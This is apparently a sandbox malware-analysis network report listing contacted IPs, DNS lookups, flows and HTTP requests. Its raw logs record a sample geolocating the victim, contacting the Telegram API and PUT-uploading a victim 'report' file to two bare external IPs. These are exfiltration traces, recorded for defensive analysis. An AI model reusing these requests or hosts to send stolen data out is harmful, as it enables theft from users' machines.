Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 104.76.70.102 | Active | Moloch |
| 129.151.210.129 | Active | Moloch |
| 138.201.197.74 | Active | Moloch |
| 149.154.167.220 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 167.86.115.218 | Active | Moloch |
| 185.189.159.121 | Active | Moloch |
| 208.95.112.1 | Active | Moloch |
| 5.181.12.94 | Active | Moloch |
| 65.21.49.163 | Active | Moloch |
| 89.46.80.136 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| r3.i.lencr.org | 104.76.70.102 | |
| ip-api.com | 208.95.112.1 | |
| api.telegram.org | 149.154.167.220 | |
| x1.i.lencr.org | 104.76.70.102 | |
TCP Requests

| Source | Destination | Hostname |
|---|---|---|
| 192.168.56.101:49172 | 104.76.70.102:80 | x1.i.lencr.org |
| 192.168.56.101:49173 | 104.76.70.102:80 | x1.i.lencr.org |
| 192.168.56.101:49174 | 138.201.197.74:8080 | |
| 192.168.56.101:49175 | 149.154.167.220:443 | api.telegram.org |
| 192.168.56.101:49165 | 208.95.112.1:80 | ip-api.com |
| 192.168.56.101:49170 | 5.181.12.94:80 | |
| 192.168.56.101:49171 | 89.46.80.136:443 | |

UDP Requests

| Source | Destination |
|---|---|
| 192.168.56.101:53004 | 164.124.101.2:53 |
| 192.168.56.101:54148 | 164.124.101.2:53 |
| 192.168.56.101:55146 | 164.124.101.2:53 |
| 192.168.56.101:59002 | 164.124.101.2:53 |
| 192.168.56.101:137 | 192.168.56.103:137 |
| 192.168.56.101:137 | 192.168.56.255:137 |
| 192.168.56.101:138 | 192.168.56.255:138 |
| 192.168.56.101:59005 | 239.255.255.250:1900 |
HTTP Requests

GET 200 http://ip-api.com/line?fields=query,country

Request:
GET /line?fields=query,country HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Date: Sun, 11 Jun 2023 13:28:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 28
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
PUT 100 http://5.181.12.94/GxRwy_test22%40TEST22-PC_report.wsr

Request:
PUT /GxRwy_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 5.181.12.94
Content-Length: 41893
Expect: 100-continue
Connection: Keep-Alive

Response:
HTTP/1.1 100 Continue
GET 200 http://r3.i.lencr.org/

Request:
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: r3.i.lencr.org

Response:
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Sat, 13 Feb 2021 01:07:28 GMT
ETag: "60272650-51a"
Unused62: 8096267
Cache-Control: max-age=3600
Expires: Sun, 11 Jun 2023 14:29:25 GMT
Date: Sun, 11 Jun 2023 13:29:25 GMT
Content-Length: 1306
Connection: keep-alive
GET 200 http://x1.i.lencr.org/

Request:
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x1.i.lencr.org

Response:
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 19 Jan 2018 23:38:04 GMT
ETag: "5a62815c-56f"
Content-Disposition: attachment; filename="ISRG Root X1.der"
Cache-Control: max-age=23298
Expires: Sun, 11 Jun 2023 19:57:43 GMT
Date: Sun, 11 Jun 2023 13:29:25 GMT
Content-Length: 1391
Connection: keep-alive
PUT 100 http://138.201.197.74:8080/GxRwy_test22%40TEST22-PC_report.wsr

Request:
PUT /GxRwy_test22%40TEST22-PC_report.wsr HTTP/1.1
Host: 138.201.197.74:8080
Content-Length: 41893
Expect: 100-continue
Connection: Keep-Alive

Response:
HTTP/1.1 100 Continue
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
| TLS 1.2 192.168.56.101:49171 -> 89.46.80.136:443 | C=US, O=Let's Encrypt, CN=R3 | CN=transfer.fragnet.gg | 14:fc:1d:17:5c:4b:36:16:b0:e2:f4:bc:bb:3f:64:68:ee:dc:39:ab |
Snort Alerts
No Snort Alerts